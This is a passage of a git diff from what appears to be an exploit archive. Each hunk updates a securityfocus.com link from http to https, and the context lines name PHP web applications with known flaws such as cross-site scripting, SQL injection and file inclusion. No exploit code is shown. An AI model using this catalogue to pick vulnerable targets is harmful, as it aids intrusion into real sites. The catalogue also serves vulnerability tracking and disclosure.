sanitize user-supplied input. diff --git a/exploits/php/webapps/29506.txt b/exploits/php/webapps/29506.txt index 64f9e9896..1586f3be7 100644 --- a/exploits/php/webapps/29506.txt +++ b/exploits/php/webapps/29506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22169/info +source: https://www.securityfocus.com/bid/22169/info Bitweaver is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29507.txt b/exploits/php/webapps/29507.txt index f263800a8..a23ca04e0 100644 --- a/exploits/php/webapps/29507.txt +++ b/exploits/php/webapps/29507.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22173/info +source: https://www.securityfocus.com/bid/22173/info 212Cafe Guestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29508.sh b/exploits/php/webapps/29508.sh index 7b26e501d..9adac2bcd 100755 --- a/exploits/php/webapps/29508.sh +++ b/exploits/php/webapps/29508.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22191/info +source: https://www.securityfocus.com/bid/22191/info Multiple VoIP phones using the Aredfox PA168 Chipset are prone to a session-hijacking vulnerability due to a design error. diff --git a/exploits/php/webapps/29521.txt b/exploits/php/webapps/29521.txt index a9dbf80b3..23367f65e 100644 --- a/exploits/php/webapps/29521.txt +++ b/exploits/php/webapps/29521.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22218/info +source: https://www.securityfocus.com/bid/22218/info Virtual Host Administrator is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29522.py b/exploits/php/webapps/29522.py index 19c235134..fa9522e6b 100755 --- a/exploits/php/webapps/29522.py +++ b/exploits/php/webapps/29522.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22220/info +source: https://www.securityfocus.com/bid/22220/info WordPress is prone to a denial-of-service vulnerability and an information-disclosure vulnerability. diff --git a/exploits/php/webapps/29529.txt b/exploits/php/webapps/29529.txt index b57d04333..051ad5b1a 100644 --- a/exploits/php/webapps/29529.txt +++ b/exploits/php/webapps/29529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22263/info +source: https://www.securityfocus.com/bid/22263/info PHP Membership Manager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. 
diff --git a/exploits/php/webapps/29530.txt b/exploits/php/webapps/29530.txt index 939e51fa3..3609fe89a 100644 --- a/exploits/php/webapps/29530.txt +++ b/exploits/php/webapps/29530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22265/info +source: https://www.securityfocus.com/bid/22265/info FD Script is prone to an information-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29534.txt b/exploits/php/webapps/29534.txt index 797a13045..a6ac9e840 100644 --- a/exploits/php/webapps/29534.txt +++ b/exploits/php/webapps/29534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22282/info +source: https://www.securityfocus.com/bid/22282/info Vivvo Article Management CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29537.txt b/exploits/php/webapps/29537.txt index 083e31dba..5f745b6f0 100644 --- a/exploits/php/webapps/29537.txt +++ b/exploits/php/webapps/29537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22293/info +source: https://www.securityfocus.com/bid/22293/info MDPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29539.txt b/exploits/php/webapps/29539.txt index ae6367415..477db3436 100644 --- a/exploits/php/webapps/29539.txt +++ b/exploits/php/webapps/29539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22319/info +source: https://www.securityfocus.com/bid/22319/info EncapsCMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29556.txt b/exploits/php/webapps/29556.txt index 8cd5fa3f9..a1c6780cc 100644 --- a/exploits/php/webapps/29556.txt 
+++ b/exploits/php/webapps/29556.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22346/info +source: https://www.securityfocus.com/bid/22346/info OpenEMR is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29557.txt b/exploits/php/webapps/29557.txt index 2ed3e5316..005cae008 100644 --- a/exploits/php/webapps/29557.txt +++ b/exploits/php/webapps/29557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22348/info +source: https://www.securityfocus.com/bid/22348/info OpenEMR is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29559.txt b/exploits/php/webapps/29559.txt index bcb9fe84f..8a8eb3a84 100644 --- a/exploits/php/webapps/29559.txt +++ b/exploits/php/webapps/29559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22369/info +source: https://www.securityfocus.com/bid/22369/info EasyMoblog is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29560.txt b/exploits/php/webapps/29560.txt index 31e9bd2b4..a91c1ceb9 100644 --- a/exploits/php/webapps/29560.txt +++ b/exploits/php/webapps/29560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22374/info +source: https://www.securityfocus.com/bid/22374/info PHPProbid is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29561.txt b/exploits/php/webapps/29561.txt index 14df29757..ff9365112 100644 --- a/exploits/php/webapps/29561.txt +++ b/exploits/php/webapps/29561.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22375/info +source: https://www.securityfocus.com/bid/22375/info Uebimiau is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29562.txt b/exploits/php/webapps/29562.txt index 01c211eb8..02b82250f 100644 --- a/exploits/php/webapps/29562.txt +++ b/exploits/php/webapps/29562.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29563.txt b/exploits/php/webapps/29563.txt index 909d465ac..1bd0eac73 100644 --- a/exploits/php/webapps/29563.txt +++ b/exploits/php/webapps/29563.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29564.txt b/exploits/php/webapps/29564.txt index bc6d49b9c..4fd05afe8 100644 --- a/exploits/php/webapps/29564.txt +++ b/exploits/php/webapps/29564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29565.txt b/exploits/php/webapps/29565.txt index 5dca924a5..2ec6649ff 100644 --- a/exploits/php/webapps/29565.txt +++ b/exploits/php/webapps/29565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/29566.txt b/exploits/php/webapps/29566.txt index a8ce31a08..4d4a4ca93 100644 --- a/exploits/php/webapps/29566.txt +++ b/exploits/php/webapps/29566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29568.txt b/exploits/php/webapps/29568.txt index 13a33cf88..4e21ed627 100644 --- a/exploits/php/webapps/29568.txt +++ b/exploits/php/webapps/29568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22409/info +source: https://www.securityfocus.com/bid/22409/info Coppermine Photo Gallery is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29569.txt b/exploits/php/webapps/29569.txt index 0ff88f417..abb4444db 100644 --- a/exploits/php/webapps/29569.txt +++ b/exploits/php/webapps/29569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22431/info +source: https://www.securityfocus.com/bid/22431/info MySQLNewsEngine is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29571.txt b/exploits/php/webapps/29571.txt index 21f9af612..17755cb1c 100644 --- a/exploits/php/webapps/29571.txt +++ b/exploits/php/webapps/29571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22453/info +source: https://www.securityfocus.com/bid/22453/info SysCP is prone to an arbitrary code-execution vulnerability. diff --git a/exploits/php/webapps/29572.txt b/exploits/php/webapps/29572.txt index c3df79ab2..a120f469e 100644 --- a/exploits/php/webapps/29572.txt +++ b/exploits/php/webapps/29572.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22474/info +source: https://www.securityfocus.com/bid/22474/info cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29574.php b/exploits/php/webapps/29574.php index 8881ed282..cb153d589 100644 --- a/exploits/php/webapps/29574.php +++ b/exploits/php/webapps/29574.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22498/info +source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29578.txt b/exploits/php/webapps/29578.txt index bd4451715..1d03ca355 100644 --- a/exploits/php/webapps/29578.txt +++ b/exploits/php/webapps/29578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29579.txt b/exploits/php/webapps/29579.txt index 4944b7acf..cabbde462 100644 --- a/exploits/php/webapps/29579.txt +++ b/exploits/php/webapps/29579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29580.txt b/exploits/php/webapps/29580.txt index 0fe4ceac8..19006a167 100644 --- a/exploits/php/webapps/29580.txt +++ b/exploits/php/webapps/29580.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29581.txt b/exploits/php/webapps/29581.txt index 6a6cab402..a74cf39f8 100644 --- a/exploits/php/webapps/29581.txt +++ b/exploits/php/webapps/29581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29582.txt b/exploits/php/webapps/29582.txt index b9b94d593..66873269a 100644 --- a/exploits/php/webapps/29582.txt +++ b/exploits/php/webapps/29582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29583.txt b/exploits/php/webapps/29583.txt index 2616a418a..ed17636dd 100644 --- a/exploits/php/webapps/29583.txt +++ b/exploits/php/webapps/29583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29584.txt b/exploits/php/webapps/29584.txt index a806ecc22..8876ae517 100644 --- a/exploits/php/webapps/29584.txt +++ b/exploits/php/webapps/29584.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29585.txt b/exploits/php/webapps/29585.txt index 6b843dd82..7475c7a26 100644 --- a/exploits/php/webapps/29585.txt +++ b/exploits/php/webapps/29585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29586.txt b/exploits/php/webapps/29586.txt index f8a0aeb0a..0d1db4b3f 100644 --- a/exploits/php/webapps/29586.txt +++ b/exploits/php/webapps/29586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29587.txt b/exploits/php/webapps/29587.txt index 9d9162b0f..5cc9704ee 100644 --- a/exploits/php/webapps/29587.txt +++ b/exploits/php/webapps/29587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29588.txt b/exploits/php/webapps/29588.txt index 1be8071b6..366ac5a57 100644 --- a/exploits/php/webapps/29588.txt +++ b/exploits/php/webapps/29588.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29589.txt b/exploits/php/webapps/29589.txt index 9ecac6625..d4061d202 100644 --- a/exploits/php/webapps/29589.txt +++ b/exploits/php/webapps/29589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29590.txt b/exploits/php/webapps/29590.txt index 6ebd2d106..e29def753 100644 --- a/exploits/php/webapps/29590.txt +++ b/exploits/php/webapps/29590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29591.txt b/exploits/php/webapps/29591.txt index 8ec996ba2..10ecf2c3c 100644 --- a/exploits/php/webapps/29591.txt +++ b/exploits/php/webapps/29591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29592.txt b/exploits/php/webapps/29592.txt index 1fb1e0dea..ba1b3ab5f 100644 --- a/exploits/php/webapps/29592.txt +++ b/exploits/php/webapps/29592.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29593.txt b/exploits/php/webapps/29593.txt index 9acc7b644..7185ad365 100644 --- a/exploits/php/webapps/29593.txt +++ b/exploits/php/webapps/29593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29598.txt b/exploits/php/webapps/29598.txt index 488143198..c07665989 100644 --- a/exploits/php/webapps/29598.txt +++ b/exploits/php/webapps/29598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22534/info +source: https://www.securityfocus.com/bid/22534/info WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29599.txt b/exploits/php/webapps/29599.txt index 82d2bbfe8..efbd67af6 100644 --- a/exploits/php/webapps/29599.txt +++ b/exploits/php/webapps/29599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22537/info +source: https://www.securityfocus.com/bid/22537/info TaskFreak! is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29602.txt b/exploits/php/webapps/29602.txt index cf204e0ec..6ce9cfc97 100644 --- a/exploits/php/webapps/29602.txt +++ b/exploits/php/webapps/29602.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22559/info +source: https://www.securityfocus.com/bid/22559/info WebTester is prone to multiple input-validation issues, including multiple cross-site scripting and multiple SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29604.txt b/exploits/php/webapps/29604.txt index 5441b1a70..e2d00685c 100644 --- a/exploits/php/webapps/29604.txt +++ b/exploits/php/webapps/29604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22575/info +source: https://www.securityfocus.com/bid/22575/info ibProArcade is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29605.txt b/exploits/php/webapps/29605.txt index b0a7bdf8f..bdb21f00f 100644 --- a/exploits/php/webapps/29605.txt +++ b/exploits/php/webapps/29605.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22577/info +source: https://www.securityfocus.com/bid/22577/info Deskpro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29606.txt b/exploits/php/webapps/29606.txt index 53e9aced7..668ef6606 100644 --- a/exploits/php/webapps/29606.txt +++ b/exploits/php/webapps/29606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22578/info +source: https://www.securityfocus.com/bid/22578/info Calendar Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29608.txt b/exploits/php/webapps/29608.txt index 71f6b8385..df9b426a8 100644 --- a/exploits/php/webapps/29608.txt +++ b/exploits/php/webapps/29608.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22588/info +source: https://www.securityfocus.com/bid/22588/info CedStat is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29609.txt b/exploits/php/webapps/29609.txt index 69f334ef6..58e061338 100644 --- a/exploits/php/webapps/29609.txt +++ b/exploits/php/webapps/29609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22589/info +source: https://www.securityfocus.com/bid/22589/info Meganoide's news is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29610.txt b/exploits/php/webapps/29610.txt index 745bf3a4d..4154610c7 100644 --- a/exploits/php/webapps/29610.txt +++ b/exploits/php/webapps/29610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22590/info +source: https://www.securityfocus.com/bid/22590/info Ezboo webstats is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access. diff --git a/exploits/php/webapps/29615.txt b/exploits/php/webapps/29615.txt index 06b573832..113369837 100644 --- a/exploits/php/webapps/29615.txt +++ b/exploits/php/webapps/29615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22611/info +source: https://www.securityfocus.com/bid/22611/info Powerschool is prone to an information-disclosure vulnerability because the application discloses information about administrative session variables. diff --git a/exploits/php/webapps/29621.txt b/exploits/php/webapps/29621.txt index c4903e231..d892722fc 100644 --- a/exploits/php/webapps/29621.txt +++ b/exploits/php/webapps/29621.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22635/info +source: https://www.securityfocus.com/bid/22635/info MyCalendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29624.txt b/exploits/php/webapps/29624.txt index 2c5b413c1..27062b186 100644 --- a/exploits/php/webapps/29624.txt +++ b/exploits/php/webapps/29624.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22653/info +source: https://www.securityfocus.com/bid/22653/info CedStat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29625.txt b/exploits/php/webapps/29625.txt index eb2df2ab2..d86a28402 100644 --- a/exploits/php/webapps/29625.txt +++ b/exploits/php/webapps/29625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22655/info +source: https://www.securityfocus.com/bid/22655/info phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29626.txt b/exploits/php/webapps/29626.txt index 9a65a0856..1303846d2 100644 --- a/exploits/php/webapps/29626.txt +++ b/exploits/php/webapps/29626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22655/info +source: https://www.securityfocus.com/bid/22655/info phpTrafficA is prone to multiple directory-traversal vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29627.php b/exploits/php/webapps/29627.php index bfe8f1f16..ae4618be0 100644 --- a/exploits/php/webapps/29627.php +++ b/exploits/php/webapps/29627.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22661/info +source: https://www.securityfocus.com/bid/22661/info Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29628.txt b/exploits/php/webapps/29628.txt index 87760ef70..1c56f7a76 100644 --- a/exploits/php/webapps/29628.txt +++ b/exploits/php/webapps/29628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22661/info +source: https://www.securityfocus.com/bid/22661/info Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29629.txt b/exploits/php/webapps/29629.txt index 2450d57ff..a3b09de5c 100644 --- a/exploits/php/webapps/29629.txt +++ b/exploits/php/webapps/29629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22661/info +source: https://www.securityfocus.com/bid/22661/info Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29631.txt b/exploits/php/webapps/29631.txt index e568e2a2e..1e995385a 100644 --- a/exploits/php/webapps/29631.txt +++ b/exploits/php/webapps/29631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22667/info +source: https://www.securityfocus.com/bid/22667/info Pyrophobia is prone to multiple input-validation vulnerabilities, including multiple local file-include issues and multiple cross-site scripting issues. 
diff --git a/exploits/php/webapps/29632.txt b/exploits/php/webapps/29632.txt index 07e60b754..9bc1554ba 100644 --- a/exploits/php/webapps/29632.txt +++ b/exploits/php/webapps/29632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22667/info +source: https://www.securityfocus.com/bid/22667/info Pyrophobia is prone to multiple input-validation vulnerabilities, including multiple local file-include issues and multiple cross-site scripting issues. diff --git a/exploits/php/webapps/29634.txt b/exploits/php/webapps/29634.txt index 19ac35fdf..dc27c4e68 100644 --- a/exploits/php/webapps/29634.txt +++ b/exploits/php/webapps/29634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22669/info +source: https://www.securityfocus.com/bid/22669/info Simple Plantilla PHP is prone to multiple input-validation issues, including a local file-include vulnerability and an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/29635.txt b/exploits/php/webapps/29635.txt index 66b1b213e..2f2c6439d 100644 --- a/exploits/php/webapps/29635.txt +++ b/exploits/php/webapps/29635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22670/info +source: https://www.securityfocus.com/bid/22670/info Pheap is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29636.txt b/exploits/php/webapps/29636.txt index 821387222..fa495bb80 100644 --- a/exploits/php/webapps/29636.txt +++ b/exploits/php/webapps/29636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22675/info +source: https://www.securityfocus.com/bid/22675/info LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue. diff --git a/exploits/php/webapps/29637.txt b/exploits/php/webapps/29637.txt index 7a037ca1e..9f31e5689 100644 --- a/exploits/php/webapps/29637.txt 
+++ b/exploits/php/webapps/29637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22675/info +source: https://www.securityfocus.com/bid/22675/info LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue. diff --git a/exploits/php/webapps/29638.txt b/exploits/php/webapps/29638.txt index 391c2b0bf..e4c69212f 100644 --- a/exploits/php/webapps/29638.txt +++ b/exploits/php/webapps/29638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22675/info +source: https://www.securityfocus.com/bid/22675/info LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue. diff --git a/exploits/php/webapps/29639.txt b/exploits/php/webapps/29639.txt index 40b94f703..f1a50ac87 100644 --- a/exploits/php/webapps/29639.txt +++ b/exploits/php/webapps/29639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22675/info +source: https://www.securityfocus.com/bid/22675/info LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue. diff --git a/exploits/php/webapps/29640.txt b/exploits/php/webapps/29640.txt index b5f7e7650..f5163b267 100644 --- a/exploits/php/webapps/29640.txt +++ b/exploits/php/webapps/29640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22697/info +source: https://www.securityfocus.com/bid/22697/info Shop Kit Plus is prone to a local file-include vulnerability because it fails to adequately sanitize user-supplied data. diff --git a/exploits/php/webapps/29641.txt b/exploits/php/webapps/29641.txt index 39a7594c8..c4a1d851e 100644 --- a/exploits/php/webapps/29641.txt +++ b/exploits/php/webapps/29641.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22698/info +source: https://www.securityfocus.com/bid/22698/info xt:Commerce is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29642.txt b/exploits/php/webapps/29642.txt index 4a4c074cc..984aafb37 100644 --- a/exploits/php/webapps/29642.txt +++ b/exploits/php/webapps/29642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22700/info +source: https://www.securityfocus.com/bid/22700/info Simple one-file gallery is prone to multiple input-validation vulnerabilities, including a local file-include issue and a cross-site scripting issue. diff --git a/exploits/php/webapps/29643.txt b/exploits/php/webapps/29643.txt index b4ab90757..9a706e0ad 100644 --- a/exploits/php/webapps/29643.txt +++ b/exploits/php/webapps/29643.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22700/info +source: https://www.securityfocus.com/bid/22700/info Simple one-file gallery is prone to multiple input-validation vulnerabilities, including a local file-include issue and a cross-site scripting issue. diff --git a/exploits/php/webapps/29644.txt b/exploits/php/webapps/29644.txt index 1fda828a8..ad1ffa3ba 100644 --- a/exploits/php/webapps/29644.txt +++ b/exploits/php/webapps/29644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22703/info +source: https://www.securityfocus.com/bid/22703/info picKLE is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29645.txt b/exploits/php/webapps/29645.txt index 1ece521c6..799181ceb 100644 --- a/exploits/php/webapps/29645.txt +++ b/exploits/php/webapps/29645.txt 
